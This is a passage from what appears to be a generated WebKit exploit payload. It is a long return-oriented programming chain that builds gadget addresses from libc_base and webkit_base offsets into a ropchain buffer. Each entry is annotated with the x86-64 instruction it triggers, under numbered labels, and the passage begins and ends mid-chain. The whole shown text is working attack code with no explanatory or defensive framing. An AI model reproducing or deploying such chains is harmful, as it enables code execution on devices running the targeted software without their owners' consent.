libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+113280, //L1230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1230:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+113336, //L1231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1231:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+113440, //L1233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1233:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1235:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+113560, //L1238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+113544, //L1236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1236:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1238:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+113704, //L1241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+113672, //L1239
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+113688, //L1240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1239:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1240:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1241:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+113776, //L1243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1243:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+113832, //L1244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1244:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+113928, //L1247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1246:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1247:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1248:
db([25, 0]); // 0x19
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+114024, //L1249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+114040, //L1250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1249:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1250:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+114128, //L1252
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1252:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+114184, //L1253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1253:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+114256, //L1256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1256:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+114312, //L1257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1257:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1259:
libc_base+756002, //mov [rdi], r8
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+114448, //L1260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1260:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1262:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+114568, //L1265
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+114552, //L1263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1263:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1265:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+114712, //L1268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+114680, //L1266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+114696, //L1267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1266:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1267:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1268:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+114784, //L1270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1270:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+114840, //L1271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1271:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+114936, //L1274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1273:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1274:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1275:
db([26, 0]); // 0x1a
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+115032, //L1276
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+115048, //L1277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1276:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+115136, //L1279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1279:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+115192, //L1280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1280:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+115264, //L1283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1283:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+115320, //L1284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1284:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1286:
libc_base+144605, //pop rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+115456, //L1287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1287:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1289:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+115576, //L1292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+115560, //L1290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1290:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1292:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+115720, //L1295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+115688, //L1293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+115704, //L1294
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1294:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1295:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+115792, //L1297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1297:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+115848, //L1298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1298:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+115944, //L1301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1300:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1301:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1302:
db([27, 0]); // 0x1b
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+116040, //L1303
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+116056, //L1304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1303:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1304:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+116144, //L1306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1306:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+116200, //L1307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+116272, //L1310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1310:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+116328, //L1311
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1311:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+116416, //L1313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1313:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1315:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+116536, //L1318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+116520, //L1316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1316:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1318:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+116680, //L1321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+116648, //L1319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+116664, //L1320
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1319:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1320:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1321:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+116752, //L1323
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1323:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+116808, //L1324
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1324:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+116904, //L1327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1326:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1327:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1328:
db([1, 0]); // 0x1
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+117000, //L1329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+117016, //L1330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1329:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1330:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+117104, //L1332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1332:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+117160, //L1333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1333:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+117264, //L1335
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1335:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1337:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+117384, //L1340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+117368, //L1338
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1338:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1340:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+117528, //L1343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+117496, //L1341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+117512, //L1342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1341:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1343:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+117600, //L1345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1345:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+117656, //L1346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1346:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+117752, //L1349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1348:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1349:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1350:
db([28, 0]); // 0x1c
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+117848, //L1351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+117864, //L1352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1351:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1352:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+117952, //L1354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1354:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+118008, //L1355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1355:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+118080, //L1358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1358:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+118136, //L1359
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1359:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1361:
webkit_base+12288695, //mov [rdi], r9
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+118272, //L1362
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1362:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1364:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+118392, //L1367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+118376, //L1365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1367:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+118536, //L1370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+118504, //L1368
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+118520, //L1369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1368:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1369:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1370:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+118608, //L1372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1372:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+118664, //L1373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1373:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+118760, //L1376
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1375:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1376:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1377:
db([29, 0]); // 0x1d
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+118856, //L1378
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+118872, //L1379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1378:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1379:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+118960, //L1381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1381:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+119016, //L1382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1382:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+119088, //L1385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
